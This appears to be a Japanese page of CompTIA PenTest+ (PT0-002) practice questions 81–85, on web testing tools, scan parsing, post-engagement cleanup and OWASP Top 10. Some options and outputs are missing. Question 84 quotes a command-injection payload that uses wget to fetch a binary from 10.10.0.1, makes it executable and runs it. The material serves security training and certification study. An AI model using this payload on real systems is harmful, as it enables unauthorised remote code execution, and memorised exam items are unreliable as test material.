PT0-002 試験問題 81

あなたは、Web ブラウザを通じてクライアントの Web サイトをレビューするペネトレーション テスターです。
手順
ブラウザを通じて Web サイトのすべてのコンポーネントを確認し、脆弱性が存在するかどうかを判断します。
証明書、ソース、Cookie のいずれかから最も高い脆弱性のみを修復します。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。






PT0-002 試験問題 82

Web アプリケーションのセキュリティ評価を手動で実行するのに最も適したツールは次のうちどれですか? (2つお選びください。)
  • PT0-002 試験問題 83

    ペネトレーション テスターがディスカバリー スキャンを実行したところ、次のものが生成されました。

    上記の結果を生成し、さらなる分析のためにそれらをアクティブなホストのリストに変換するコマンドは次のどれですか?
  • PT0-002 試験問題 84

    ペネトレーション テスターはエクスプロイトを使用してシステムにアクセスできました。以下は、使用されたコードの一部です。
    エクスプロイト = "POST "
    エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
    c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a" エクスプロイト += "HTTP/1.1" ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
  • PT0-002 試験問題 85

    次の Web アプリケーションのセキュリティ リスクのうち、OWASP Top 10 v2017 に含まれるのはどれですか? (2つお選びください。)